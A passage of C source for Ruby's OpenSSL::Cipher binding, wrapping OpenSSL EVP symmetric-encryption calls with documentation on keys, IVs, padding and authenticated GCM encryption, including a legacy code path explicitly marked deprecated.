#define AllocCipher(obj, ctx) do { \
(ctx) = EVP_CIPHER_CTX_new(); \
if (!(ctx)) \
ossl_raise(rb_eRuntimeError, NULL); \
RTYPEDDATA_DATA(obj) = (ctx); \
} while (0)
#define GetCipherInit(obj, ctx) do { \
TypedData_Get_Struct((obj), EVP_CIPHER_CTX, &ossl_cipher_type, (ctx)); \
} while (0)
#define GetCipher(obj, ctx) do { \
GetCipherInit((obj), (ctx)); \
if (!(ctx)) { \
ossl_raise(rb_eRuntimeError, "Cipher not inititalized!"); \
} \
} while (0)
#define SafeGetCipher(obj, ctx) do { \
OSSL_Check_Kind((obj), cCipher); \
GetCipher((obj), (ctx)); \
} while (0)
/*
* Classes
*/
VALUE cCipher;
VALUE eCipherError;
static ID id_auth_tag_len, id_key_set;
static VALUE ossl_cipher_alloc(VALUE klass);
static void ossl_cipher_free(void *ptr);
static const rb_data_type_t ossl_cipher_type = {
"OpenSSL/Cipher",
{
0, ossl_cipher_free,
},
0, 0, RUBY_TYPED_FREE_IMMEDIATELY,
};
/*
* PUBLIC
*/
const EVP_CIPHER *
GetCipherPtr(VALUE obj)
{
if (rb_obj_is_kind_of(obj, cCipher)) {
EVP_CIPHER_CTX *ctx;
GetCipher(obj, ctx);
return EVP_CIPHER_CTX_cipher(ctx);
}
else {
const EVP_CIPHER *cipher;
StringValueCStr(obj);
cipher = EVP_get_cipherbyname(RSTRING_PTR(obj));
if (!cipher)
ossl_raise(rb_eArgError,
"unsupported cipher algorithm: %"PRIsVALUE, obj);
return cipher;
}
}
VALUE
ossl_cipher_new(const EVP_CIPHER *cipher)
{
VALUE ret;
EVP_CIPHER_CTX *ctx;
ret = ossl_cipher_alloc(cCipher);
AllocCipher(ret, ctx);
if (EVP_CipherInit_ex(ctx, cipher, NULL, NULL, NULL, -1) != 1)
ossl_raise(eCipherError, NULL);
return ret;
}
/*
* PRIVATE
*/
static void
ossl_cipher_free(void *ptr)
{
EVP_CIPHER_CTX_free(ptr);
}
static VALUE
ossl_cipher_alloc(VALUE klass)
{
return NewCipher(klass);
}
/*
* call-seq:
* Cipher.new(string) -> cipher
*
* The string must contain a valid cipher name like "AES-128-CBC" or "3DES".
*
* A list of cipher names is available by calling OpenSSL::Cipher.ciphers.
*/
static VALUE
ossl_cipher_initialize(VALUE self, VALUE str)
{
EVP_CIPHER_CTX *ctx;
const EVP_CIPHER *cipher;
char *name;
name = StringValueCStr(str);
GetCipherInit(self, ctx);
if (ctx) {
ossl_raise(rb_eRuntimeError, "Cipher already inititalized!");
}
AllocCipher(self, ctx);
if (!(cipher = EVP_get_cipherbyname(name))) {
ossl_raise(rb_eRuntimeError, "unsupported cipher algorithm (%"PRIsVALUE")", str);
}
if (EVP_CipherInit_ex(ctx, cipher, NULL, NULL, NULL, -1) != 1)
ossl_raise(eCipherError, NULL);
return self;
}
static VALUE
ossl_cipher_copy(VALUE self, VALUE other)
{
EVP_CIPHER_CTX *ctx1, *ctx2;
rb_check_frozen(self);
if (self == other) return self;
GetCipherInit(self, ctx1);
if (!ctx1) {
AllocCipher(self, ctx1);
}
SafeGetCipher(other, ctx2);
if (EVP_CIPHER_CTX_copy(ctx1, ctx2) != 1)
ossl_raise(eCipherError, NULL);
return self;
}
static void*
add_cipher_name_to_ary(const OBJ_NAME *name, VALUE ary)
{
rb_ary_push(ary, rb_str_new2(name->name));
return NULL;
}
/*
* call-seq:
* OpenSSL::Cipher.ciphers -> array[string...]
*
* Returns the names of all available ciphers in an array.
*/
static VALUE
ossl_s_ciphers(VALUE self)
{
VALUE ary;
ary = rb_ary_new();
OBJ_NAME_do_all_sorted(OBJ_NAME_TYPE_CIPHER_METH,
(void(*)(const OBJ_NAME*,void*))add_cipher_name_to_ary,
(void*)ary);
return ary;
}
/*
* call-seq:
* cipher.reset -> self
*
* Fully resets the internal state of the Cipher. By using this, the same
* Cipher instance may be used several times for encryption or decryption tasks.
*
* Internally calls EVP_CipherInit_ex(ctx, NULL, NULL, NULL, NULL, -1).
*/
static VALUE
ossl_cipher_reset(VALUE self)
{
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
if (EVP_CipherInit_ex(ctx, NULL, NULL, NULL, NULL, -1) != 1)
ossl_raise(eCipherError, NULL);
return self;
}
static VALUE
ossl_cipher_init(int argc, VALUE *argv, VALUE self, int mode)
{
EVP_CIPHER_CTX *ctx;
unsigned char key[EVP_MAX_KEY_LENGTH], *p_key = NULL;
unsigned char iv[EVP_MAX_IV_LENGTH], *p_iv = NULL;
VALUE pass, init_v;
if(rb_scan_args(argc, argv, "02", &pass, &init_v) > 0){
/*
* oops. this code mistakes salt for IV.
* We deprecated the arguments for this method, but we decided
* keeping this behaviour for backward compatibility.
*/
VALUE cname = rb_class_path(rb_obj_class(self));
rb_warn("arguments for %"PRIsVALUE"#encrypt and %"PRIsVALUE"#decrypt were deprecated; "
"use %"PRIsVALUE"#pkcs5_keyivgen to derive key and IV",
cname, cname, cname);
StringValue(pass);
GetCipher(self, ctx);
if (NIL_P(init_v)) memcpy(iv, "OpenSSL for Ruby rulez!", sizeof(iv));
else{
StringValue(init_v);
if (EVP_MAX_IV_LENGTH > RSTRING_LEN(init_v)) {
memset(iv, 0, EVP_MAX_IV_LENGTH);
memcpy(iv, RSTRING_PTR(init_v), RSTRING_LEN(init_v));
}
else memcpy(iv, RSTRING_PTR(init_v), sizeof(iv));
}
EVP_BytesToKey(EVP_CIPHER_CTX_cipher(ctx), EVP_md5(), iv,
(unsigned char *)RSTRING_PTR(pass), RSTRING_LENINT(pass), 1, key, NULL);
p_key = key;
p_iv = iv;
}
else {
GetCipher(self, ctx);
}
if (EVP_CipherInit_ex(ctx, NULL, NULL, p_key, p_iv, mode) != 1) {
ossl_raise(eCipherError, NULL);
}
if (p_key)
rb_ivar_set(self, id_key_set, Qtrue);
return self;
}
/*
* call-seq:
* cipher.encrypt -> self
*
* Initializes the Cipher for encryption.
*
* Make sure to call Cipher#encrypt or Cipher#decrypt before using any of the
* following methods:
* * [#key=, #iv=, #random_key, #random_iv, #pkcs5_keyivgen]
*
* Internally calls EVP_CipherInit_ex(ctx, NULL, NULL, NULL, NULL, 1).
*/
static VALUE
ossl_cipher_encrypt(int argc, VALUE *argv, VALUE self)
{
return ossl_cipher_init(argc, argv, self, 1);
}
/*
* call-seq:
* cipher.decrypt -> self
*
* Initializes the Cipher for decryption.
*
* Make sure to call Cipher#encrypt or Cipher#decrypt before using any of the
* following methods:
* * [#key=, #iv=, #random_key, #random_iv, #pkcs5_keyivgen]
*
* Internally calls EVP_CipherInit_ex(ctx, NULL, NULL, NULL, NULL, 0).
*/
static VALUE
ossl_cipher_decrypt(int argc, VALUE *argv, VALUE self)
{
return ossl_cipher_init(argc, argv, self, 0);
}
/*
* call-seq:
* cipher.pkcs5_keyivgen(pass, salt = nil, iterations = 2048, digest = "MD5") -> nil
*
* Generates and sets the key/IV based on a password.
*
* *WARNING*: This method is only PKCS5 v1.5 compliant when using RC2, RC4-40,
* or DES with MD5 or SHA1. Using anything else (like AES) will generate the
* key/iv using an OpenSSL specific method. This method is deprecated and
* should no longer be used. Use a PKCS5 v2 key generation method from
* OpenSSL::PKCS5 instead.
*
* === Parameters
* * +salt+ must be an 8 byte string if provided.
* * +iterations+ is a integer with a default of 2048.
* * +digest+ is a Digest object that defaults to 'MD5'
*
* A minimum of 1000 iterations is recommended.
*
*/
static VALUE
ossl_cipher_pkcs5_keyivgen(int argc, VALUE *argv, VALUE self)
{
EVP_CIPHER_CTX *ctx;
const EVP_MD *digest;
VALUE vpass, vsalt, viter, vdigest;
unsigned char key[EVP_MAX_KEY_LENGTH], iv[EVP_MAX_IV_LENGTH], *salt = NULL;
int iter;
rb_scan_args(argc, argv, "13", &vpass, &vsalt, &viter, &vdigest);
StringValue(vpass);
if(!NIL_P(vsalt)){
StringValue(vsalt);
if(RSTRING_LEN(vsalt) != PKCS5_SALT_LEN)
ossl_raise(eCipherError, "salt must be an 8-octet string");
salt = (unsigned char *)RSTRING_PTR(vsalt);
}
iter = NIL_P(viter) ? 2048 : NUM2INT(viter);
digest = NIL_P(vdigest) ? EVP_md5() : GetDigestPtr(vdigest);
GetCipher(self, ctx);
EVP_BytesToKey(EVP_CIPHER_CTX_cipher(ctx), digest, salt,
(unsigned char *)RSTRING_PTR(vpass), RSTRING_LENINT(vpass), iter, key, iv);
if (EVP_CipherInit_ex(ctx, NULL, NULL, key, iv, -1) != 1)
ossl_raise(eCipherError, NULL);
OPENSSL_cleanse(key, sizeof key);
OPENSSL_cleanse(iv, sizeof iv);
rb_ivar_set(self, id_key_set, Qtrue);
return Qnil;
}
static int
ossl_cipher_update_long(EVP_CIPHER_CTX *ctx, unsigned char *out, long *out_len_ptr,
const unsigned char *in, long in_len)
{
int out_part_len;
int limit = INT_MAX / 2 + 1;
long out_len = 0;
do {
int in_part_len = in_len > limit ? limit : (int)in_len;
if (!EVP_CipherUpdate(ctx, out ? (out + out_len) : 0,
&out_part_len, in, in_part_len))
return 0;
out_len += out_part_len;
in += in_part_len;
} while ((in_len -= limit) > 0);
if (out_len_ptr)
*out_len_ptr = out_len;
return 1;
}
/*
* call-seq:
* cipher.update(data [, buffer]) -> string or buffer
*
* Encrypts data in a streaming fashion. Hand consecutive blocks of data
* to the +update+ method in order to encrypt it. Returns the encrypted
* data chunk. When done, the output of Cipher#final should be additionally
* added to the result.
*
* If +buffer+ is given, the encryption/decryption result will be written to
* it. +buffer+ will be resized automatically.
*/
static VALUE
ossl_cipher_update(int argc, VALUE *argv, VALUE self)
{
EVP_CIPHER_CTX *ctx;
unsigned char *in;
long in_len, out_len;
VALUE data, str;
rb_scan_args(argc, argv, "11", &data, &str);
if (!RTEST(rb_attr_get(self, id_key_set)))
ossl_raise(eCipherError, "key not set");
StringValue(data);
in = (unsigned char *)RSTRING_PTR(data);
if ((in_len = RSTRING_LEN(data)) == 0)
ossl_raise(rb_eArgError, "data must not be empty");
GetCipher(self, ctx);
out_len = in_len+EVP_CIPHER_CTX_block_size(ctx);
if (out_len <= 0) {
ossl_raise(rb_eRangeError,
"data too big to make output buffer: %ld bytes", in_len);
}
if (NIL_P(str)) {
str = rb_str_new(0, out_len);
} else {
StringValue(str);
rb_str_resize(str, out_len);
}
if (!ossl_cipher_update_long(ctx, (unsigned char *)RSTRING_PTR(str), &out_len, in, in_len))
ossl_raise(eCipherError, NULL);
assert(out_len < RSTRING_LEN(str));
rb_str_set_len(str, out_len);
return str;
}
/*
* call-seq:
* cipher.final -> string
*
* Returns the remaining data held in the cipher object. Further calls to
* Cipher#update or Cipher#final will return garbage. This call should always
* be made as the last call of an encryption or decryption operation, after
* after having fed the entire plaintext or ciphertext to the Cipher instance.
*
* If an authenticated cipher was used, a CipherError is raised if the tag
* could not be authenticated successfully. Only call this method after
* setting the authentication tag and passing the entire contents of the
* ciphertext into the cipher.
*/
static VALUE
ossl_cipher_final(VALUE self)
{
EVP_CIPHER_CTX *ctx;
int out_len;
VALUE str;
GetCipher(self, ctx);
str = rb_str_new(0, EVP_CIPHER_CTX_block_size(ctx));
if (!EVP_CipherFinal_ex(ctx, (unsigned char *)RSTRING_PTR(str), &out_len))
ossl_raise(eCipherError, NULL);
assert(out_len <= RSTRING_LEN(str));
rb_str_set_len(str, out_len);
return str;
}
/*
* call-seq:
* cipher.name -> string
*
* Returns the name of the cipher which may differ slightly from the original
* name provided.
*/
static VALUE
ossl_cipher_name(VALUE self)
{
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
return rb_str_new2(EVP_CIPHER_name(EVP_CIPHER_CTX_cipher(ctx)));
}
/*
* call-seq:
* cipher.key = string -> string
*
* Sets the cipher key. To generate a key, you should either use a secure
* random byte string or, if the key is to be derived from a password, you
* should rely on PBKDF2 functionality provided by OpenSSL::PKCS5. To
* generate a secure random-based key, Cipher#random_key may be used.
*
* Only call this method after calling Cipher#encrypt or Cipher#decrypt.
*/
static VALUE
ossl_cipher_set_key(VALUE self, VALUE key)
{
EVP_CIPHER_CTX *ctx;
int key_len;
StringValue(key);
GetCipher(self, ctx);
key_len = EVP_CIPHER_CTX_key_length(ctx);
if (RSTRING_LEN(key) != key_len)
ossl_raise(rb_eArgError, "key must be %d bytes", key_len);
if (EVP_CipherInit_ex(ctx, NULL, NULL, (unsigned char *)RSTRING_PTR(key), NULL, -1) != 1)
ossl_raise(eCipherError, NULL);
rb_ivar_set(self, id_key_set, Qtrue);
return key;
}
/*
* call-seq:
* cipher.iv = string -> string
*
* Sets the cipher IV. Please note that since you should never be using ECB
* mode, an IV is always explicitly required and should be set prior to
* encryption. The IV itself can be safely transmitted in public, but it
* should be unpredictable to prevent certain kinds of attacks. You may use
* Cipher#random_iv to create a secure random IV.
*
* Only call this method after calling Cipher#encrypt or Cipher#decrypt.
*
* If not explicitly set, the OpenSSL default of an all-zeroes ("\\0") IV is
* used.
*/
static VALUE
ossl_cipher_set_iv(VALUE self, VALUE iv)
{
EVP_CIPHER_CTX *ctx;
int iv_len = 0;
StringValue(iv);
GetCipher(self, ctx);
#if defined(HAVE_AUTHENTICATED_ENCRYPTION)
if (EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_FLAG_AEAD_CIPHER)
iv_len = (int)(VALUE)EVP_CIPHER_CTX_get_app_data(ctx);
#endif
if (!iv_len)
iv_len = EVP_CIPHER_CTX_iv_length(ctx);
if (RSTRING_LEN(iv) != iv_len)
ossl_raise(rb_eArgError, "iv must be %d bytes", iv_len);
if (EVP_CipherInit_ex(ctx, NULL, NULL, NULL, (unsigned char *)RSTRING_PTR(iv), -1) != 1)
ossl_raise(eCipherError, NULL);
return iv;
}
#ifdef HAVE_AUTHENTICATED_ENCRYPTION
/*
* call-seq:
* cipher.auth_data = string -> string
*
* Sets the cipher's additional authenticated data. This field must be
* set when using AEAD cipher modes such as GCM or CCM. If no associated
* data shall be used, this method must *still* be called with a value of "".
* The contents of this field should be non-sensitive data which will be
* added to the ciphertext to generate the authentication tag which validates
* the contents of the ciphertext.
*
* The AAD must be set prior to encryption or decryption. In encryption mode,
* it must be set after calling Cipher#encrypt and setting Cipher#key= and
* Cipher#iv=. When decrypting, the authenticated data must be set after key,
* iv and especially *after* the authentication tag has been set. I.e. set it
* only after calling Cipher#decrypt, Cipher#key=, Cipher#iv= and
* Cipher#auth_tag= first.
*/
static VALUE
ossl_cipher_set_auth_data(VALUE self, VALUE data)
{
EVP_CIPHER_CTX *ctx;
unsigned char *in;
long in_len, out_len;
StringValue(data);
in = (unsigned char *) RSTRING_PTR(data);
in_len = RSTRING_LEN(data);
GetCipher(self, ctx);
if (!ossl_cipher_update_long(ctx, NULL, &out_len, in, in_len))
ossl_raise(eCipherError, "couldn't set additional authenticated data");
return data;
}
/*
* call-seq:
* cipher.auth_tag(tag_len = 16) -> String
*
* Gets the authentication tag generated by Authenticated Encryption Cipher
* modes (GCM for example). This tag may be stored along with the ciphertext,
* then set on the decryption cipher to authenticate the contents of the
* ciphertext against changes. If the optional integer parameter +tag_len+ is
* given, the returned tag will be +tag_len+ bytes long. If the parameter is
* omitted, the default length of 16 bytes or the length previously set by
* #auth_tag_len= will be used. For maximum security, the longest possible
* should be chosen.
*
* The tag may only be retrieved after calling Cipher#final.
*/
static VALUE
ossl_cipher_get_auth_tag(int argc, VALUE *argv, VALUE self)
{
VALUE vtag_len, ret;
EVP_CIPHER_CTX *ctx;
int tag_len = 16;
rb_scan_args(argc, argv, "01", &vtag_len);
if (NIL_P(vtag_len))
vtag_len = rb_attr_get(self, id_auth_tag_len);
if (!NIL_P(vtag_len))
tag_len = NUM2INT(vtag_len);
GetCipher(self, ctx);
if (!(EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_FLAG_AEAD_CIPHER))
ossl_raise(eCipherError, "authentication tag not supported by this cipher");
ret = rb_str_new(NULL, tag_len);
if (!EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_AEAD_GET_TAG, tag_len, RSTRING_PTR(ret)))
ossl_raise(eCipherError, "retrieving the authentication tag failed");
return ret;
}
/*
* call-seq:
* cipher.auth_tag = string -> string
*
* Sets the authentication tag to verify the contents of the
* ciphertext. The tag must be set after calling Cipher#decrypt,
* Cipher#key= and Cipher#iv=, but before assigning the associated
* authenticated data using Cipher#auth_data= and of course, before
* decrypting any of the ciphertext. After all decryption is
* performed, the tag is verified automatically in the call to
* Cipher#final.
*
* For OCB mode, the tag length must be supplied with #auth_tag_len=
* beforehand.
*/
static VALUE
ossl_cipher_set_auth_tag(VALUE self, VALUE vtag)
{
EVP_CIPHER_CTX *ctx;
unsigned char *tag;
int tag_len;
StringValue(vtag);
tag = (unsigned char *) RSTRING_PTR(vtag);
tag_len = RSTRING_LENINT(vtag);
GetCipher(self, ctx);
if (!(EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_FLAG_AEAD_CIPHER))
ossl_raise(eCipherError, "authentication tag not supported by this cipher");
if (!EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_AEAD_SET_TAG, tag_len, tag))
ossl_raise(eCipherError, "unable to set AEAD tag");
return vtag;
}
/*
* call-seq:
* cipher.auth_tag_len = Integer -> Integer
*
* Sets the length of the authentication tag to be generated or to be given for
* AEAD ciphers that requires it as in input parameter. Note that not all AEAD
* ciphers support this method.
*
* In OCB mode, the length must be supplied both when encrypting and when
* decrypting, and must be before specifying an IV.
*/
static VALUE
ossl_cipher_set_auth_tag_len(VALUE self, VALUE vlen)
{
int tag_len = NUM2INT(vlen);
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
if (!(EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_FLAG_AEAD_CIPHER))
ossl_raise(eCipherError, "AEAD not supported by this cipher");
if (!EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_AEAD_SET_TAG, tag_len, NULL))
ossl_raise(eCipherError, "unable to set authentication tag length");
/* for #auth_tag */
rb_ivar_set(self, id_auth_tag_len, INT2NUM(tag_len));
return vlen;
}
/*
* call-seq:
* cipher.authenticated? -> boolean
*
* Indicated whether this Cipher instance uses an Authenticated Encryption
* mode.
*/
static VALUE
ossl_cipher_is_authenticated(VALUE self)
{
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
return (EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_FLAG_AEAD_CIPHER) ? Qtrue : Qfalse;
}
/*
* call-seq:
* cipher.iv_len = integer -> integer
*
* Sets the IV/nonce length of the Cipher. Normally block ciphers don't allow
* changing the IV length, but some make use of IV for 'nonce'. You may need
* this for interoperability with other applications.
*/
static VALUE
ossl_cipher_set_iv_length(VALUE self, VALUE iv_length)
{
int len = NUM2INT(iv_length);
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
if (!(EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_FLAG_AEAD_CIPHER))
ossl_raise(eCipherError, "cipher does not support AEAD");
if (!EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_AEAD_SET_IVLEN, len, NULL))
ossl_raise(eCipherError, "unable to set IV length");
/*
* EVP_CIPHER_CTX_iv_length() returns the default length. So we need to save
* the length somewhere. Luckily currently we aren't using app_data.
*/
EVP_CIPHER_CTX_set_app_data(ctx, (void *)(VALUE)len);
return iv_length;
}
#else
#define ossl_cipher_set_auth_data rb_f_notimplement
#define ossl_cipher_get_auth_tag rb_f_notimplement
#define ossl_cipher_set_auth_tag rb_f_notimplement
#define ossl_cipher_set_auth_tag_len rb_f_notimplement
#define ossl_cipher_is_authenticated rb_f_notimplement
#define ossl_cipher_set_iv_length rb_f_notimplement
#endif
/*
* call-seq:
* cipher.key_len = integer -> integer
*
* Sets the key length of the cipher. If the cipher is a fixed length cipher
* then attempting to set the key length to any value other than the fixed
* value is an error.
*
* Under normal circumstances you do not need to call this method (and probably shouldn't).
*
* See EVP_CIPHER_CTX_set_key_length for further information.
*/
static VALUE
ossl_cipher_set_key_length(VALUE self, VALUE key_length)
{
int len = NUM2INT(key_length);
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
if (EVP_CIPHER_CTX_set_key_length(ctx, len) != 1)
ossl_raise(eCipherError, NULL);
return key_length;
}
/*
* call-seq:
* cipher.padding = integer -> integer
*
* Enables or disables padding. By default encryption operations are padded using standard block padding and the
* padding is checked and removed when decrypting. If the pad parameter is zero then no padding is performed, the
* total amount of data encrypted or decrypted must then be a multiple of the block size or an error will occur.
*
* See EVP_CIPHER_CTX_set_padding for further information.
*/
static VALUE
ossl_cipher_set_padding(VALUE self, VALUE padding)
{
EVP_CIPHER_CTX *ctx;
int pad = NUM2INT(padding);
GetCipher(self, ctx);
if (EVP_CIPHER_CTX_set_padding(ctx, pad) != 1)
ossl_raise(eCipherError, NULL);
return padding;
}
/*
* call-seq:
* cipher.key_len -> integer
*
* Returns the key length in bytes of the Cipher.
*/
static VALUE
ossl_cipher_key_length(VALUE self)
{
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
return INT2NUM(EVP_CIPHER_CTX_key_length(ctx));
}
/*
* call-seq:
* cipher.iv_len -> integer
*
* Returns the expected length in bytes for an IV for this Cipher.
*/
static VALUE
ossl_cipher_iv_length(VALUE self)
{
EVP_CIPHER_CTX *ctx;
int len = 0;
GetCipher(self, ctx);
#if defined(HAVE_AUTHENTICATED_ENCRYPTION)
if (EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_FLAG_AEAD_CIPHER)
len = (int)(VALUE)EVP_CIPHER_CTX_get_app_data(ctx);
#endif
if (!len)
len = EVP_CIPHER_CTX_iv_length(ctx);
return INT2NUM(len);
}
/*
* call-seq:
* cipher.block_size -> integer
*
* Returns the size in bytes of the blocks on which this Cipher operates on.
*/
static VALUE
ossl_cipher_block_size(VALUE self)
{
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
return INT2NUM(EVP_CIPHER_CTX_block_size(ctx));
}
/*
* INIT
*/
void
Init_ossl_cipher(void)
{
#if 0
mOSSL = rb_define_module("OpenSSL");
eOSSLError = rb_define_class_under(mOSSL, "OpenSSLError", rb_eStandardError);
#endif
/* Document-class: OpenSSL::Cipher
*
* Provides symmetric algorithms for encryption and decryption. The
* algorithms that are available depend on the particular version
* of OpenSSL that is installed.
*
* === Listing all supported algorithms
*
* A list of supported algorithms can be obtained by
*
* puts OpenSSL::Cipher.ciphers
*
* === Instantiating a Cipher
*
* There are several ways to create a Cipher instance. Generally, a
* Cipher algorithm is categorized by its name, the key length in bits
* and the cipher mode to be used. The most generic way to create a
* Cipher is the following
*
* cipher = OpenSSL::Cipher.new('<name>-<key length>-<mode>')
*
* That is, a string consisting of the hyphenated concatenation of the
* individual components name, key length and mode. Either all uppercase
* or all lowercase strings may be used, for example:
*
* cipher = OpenSSL::Cipher.new('AES-128-CBC')
*
* For each algorithm supported, there is a class defined under the
* Cipher class that goes by the name of the cipher, e.g. to obtain an
* instance of AES, you could also use
*
* # these are equivalent
* cipher = OpenSSL::Cipher::AES.new(128, :CBC)
* cipher = OpenSSL::Cipher::AES.new(128, 'CBC')
* cipher = OpenSSL::Cipher::AES.new('128-CBC')
*
* Finally, due to its wide-spread use, there are also extra classes
* defined for the different key sizes of AES
*
* cipher = OpenSSL::Cipher::AES128.new(:CBC)
* cipher = OpenSSL::Cipher::AES192.new(:CBC)
* cipher = OpenSSL::Cipher::AES256.new(:CBC)
*
* === Choosing either encryption or decryption mode
*
* Encryption and decryption are often very similar operations for
* symmetric algorithms, this is reflected by not having to choose
* different classes for either operation, both can be done using the
* same class. Still, after obtaining a Cipher instance, we need to
* tell the instance what it is that we intend to do with it, so we
* need to call either
*
* cipher.encrypt
*
* or
*
* cipher.decrypt
*
* on the Cipher instance. This should be the first call after creating
* the instance, otherwise configuration that has already been set could
* get lost in the process.
*
* === Choosing a key
*
* Symmetric encryption requires a key that is the same for the encrypting
* and for the decrypting party and after initial key establishment should
* be kept as private information. There are a lot of ways to create
* insecure keys, the most notable is to simply take a password as the key
* without processing the password further. A simple and secure way to
* create a key for a particular Cipher is
*
* cipher = OpenSSL::AES256.new(:CFB)
* cipher.encrypt
* key = cipher.random_key # also sets the generated key on the Cipher
*
* If you absolutely need to use passwords as encryption keys, you
* should use Password-Based Key Derivation Function 2 (PBKDF2) by
* generating the key with the help of the functionality provided by
* OpenSSL::PKCS5.pbkdf2_hmac_sha1 or OpenSSL::PKCS5.pbkdf2_hmac.
*
* Although there is Cipher#pkcs5_keyivgen, its use is deprecated and
* it should only be used in legacy applications because it does not use
* the newer PKCS#5 v2 algorithms.
*
* === Choosing an IV
*
* The cipher modes CBC, CFB, OFB and CTR all need an "initialization
* vector", or short, IV. ECB mode is the only mode that does not require
* an IV, but there is almost no legitimate use case for this mode
* because of the fact that it does not sufficiently hide plaintext
* patterns. Therefore
*
* <b>You should never use ECB mode unless you are absolutely sure that
* you absolutely need it</b>
*
* Because of this, you will end up with a mode that explicitly requires
* an IV in any case. Note that for backwards compatibility reasons,
* setting an IV is not explicitly mandated by the Cipher API. If not
* set, OpenSSL itself defaults to an all-zeroes IV ("\\0", not the
* character). Although the IV can be seen as public information, i.e.
* it may be transmitted in public once generated, it should still stay
* unpredictable to prevent certain kinds of attacks. Therefore, ideally
*
* <b>Always create a secure random IV for every encryption of your
* Cipher</b>
*
* A new, random IV should be created for every encryption of data. Think
* of the IV as a nonce (number used once) - it's public but random and
* unpredictable. A secure random IV can be created as follows
*
* cipher = ...
* cipher.encrypt
* key = cipher.random_key
* iv = cipher.random_iv # also sets the generated IV on the Cipher
*
* Although the key is generally a random value, too, it is a bad choice
* as an IV. There are elaborate ways how an attacker can take advantage
* of such an IV. As a general rule of thumb, exposing the key directly
* or indirectly should be avoided at all cost and exceptions only be
* made with good reason.
*
* === Calling Cipher#final
*
* ECB (which should not be used) and CBC are both block-based modes.
* This means that unlike for the other streaming-based modes, they
* operate on fixed-size blocks of data, and therefore they require a
* "finalization" step to produce or correctly decrypt the last block of
* data by appropriately handling some form of padding. Therefore it is
* essential to add the output of OpenSSL::Cipher#final to your
* encryption/decryption buffer or you will end up with decryption errors
* or truncated data.
*
* Although this is not really necessary for streaming-mode ciphers, it is
* still recommended to apply the same pattern of adding the output of
* Cipher#final there as well - it also enables you to switch between
* modes more easily in the future.
*
* === Encrypting and decrypting some data
*
* data = "Very, very confidential data"
*
* cipher = OpenSSL::Cipher::AES.new(128, :CBC)
* cipher.encrypt
* key = cipher.random_key
* iv = cipher.random_iv
*
* encrypted = cipher.update(data) + cipher.final
* ...
* decipher = OpenSSL::Cipher::AES.new(128, :CBC)
* decipher.decrypt
* decipher.key = key
* decipher.iv = iv
*
* plain = decipher.update(encrypted) + decipher.final
*
* puts data == plain #=> true
*
* === Authenticated Encryption and Associated Data (AEAD)
*
* If the OpenSSL version used supports it, an Authenticated Encryption
* mode (such as GCM or CCM) should always be preferred over any
* unauthenticated mode. Currently, OpenSSL supports AE only in combination
* with Associated Data (AEAD) where additional associated data is included
* in the encryption process to compute a tag at the end of the encryption.
* This tag will also be used in the decryption process and by verifying
* its validity, the authenticity of a given ciphertext is established.
*
* This is superior to unauthenticated modes in that it allows to detect
* if somebody effectively changed the ciphertext after it had been
* encrypted. This prevents malicious modifications of the ciphertext that
* could otherwise be exploited to modify ciphertexts in ways beneficial to
* potential attackers.
*
* An associated data is used where there is additional information, such as
* headers or some metadata, that must be also authenticated but not
* necessarily need to be encrypted. If no associated data is needed for
* encryption and later decryption, the OpenSSL library still requires a
* value to be set - "" may be used in case none is available.
*
* An example using the GCM (Galois/Counter Mode). You have 16 bytes +key+,
* 12 bytes (96 bits) +nonce+ and the associated data +auth_data+. Be sure
* not to reuse the +key+ and +nonce+ pair. Reusing an nonce ruins the
* security gurantees of GCM mode.
*
* cipher = OpenSSL::Cipher::AES.new(128, :GCM).encrypt
* cipher.key = key
* cipher.iv = nonce
* cipher.auth_data = auth_data
*
* encrypted = cipher.update(data) + cipher.final
* tag = cipher.auth_tag # produces 16 bytes tag by default
*
* Now you are the receiver. You know the +key+ and have received +nonce+,
* +auth_data+, +encrypted+ and +tag+ through an untrusted network. Note
* that GCM accepts an arbitrary length tag between 1 and 16 bytes. You may
* additionally need to check that the received tag has the correct length,
* or you allow attackers to forge a valid single byte tag for the tampered
* ciphertext with a probability of 1/256.
*
* raise "tag is truncated!" unless tag.bytesize == 16
* decipher = OpenSSL::Cipher::AES.new(128, :GCM).decrypt
* decipher.key = key
* decipher.iv = nonce
* decipher.auth_tag = tag
* decipher.auth_data = auth_data
*
* decrypted = decipher.update(encrypted) + decipher.final
*
* puts data == decrypted #=> true
*/
cCipher = rb_define_class_under(mOSSL, "Cipher", rb_cObject);
eCipherError = rb_define_class_under(cCipher, "CipherError", eOSSLError);
rb_define_alloc_func(cCipher, ossl_cipher_alloc);
rb_define_copy_func(cCipher, ossl_cipher_copy);
rb_define_module_function(cCipher, "ciphers", ossl_s_ciphers, 0);
rb_define_method(cCipher, "initialize", ossl_cipher_initialize, 1);
rb_define_method(cCipher, "reset", ossl_cipher_reset, 0);
rb_define_method(cCipher, "encrypt", ossl_cipher_encrypt, -1);
rb_define_method(cCipher, "decrypt", ossl_cipher_decrypt, -1);
rb_define_method(cCipher, "pkcs5_keyivgen", ossl_cipher_pkcs5_keyivgen, -1);
rb_define_method(cCipher, "update", ossl_cipher_update, -1);
rb_define_method(cCipher, "final", ossl_cipher_final, 0);
rb_define_method(cCipher, "name", ossl_cipher_name, 0);
rb_define_method(cCipher, "key=", ossl_cipher_set_key, 1);
rb_define_method(cCipher, "auth_data=", ossl_cipher_set_auth_data, 1);
rb_define_method(cCipher, "auth_tag=", ossl_cipher_set_auth_tag, 1);
rb_define_method(cCipher, "auth_tag", ossl_cipher_get_auth_tag, -1);
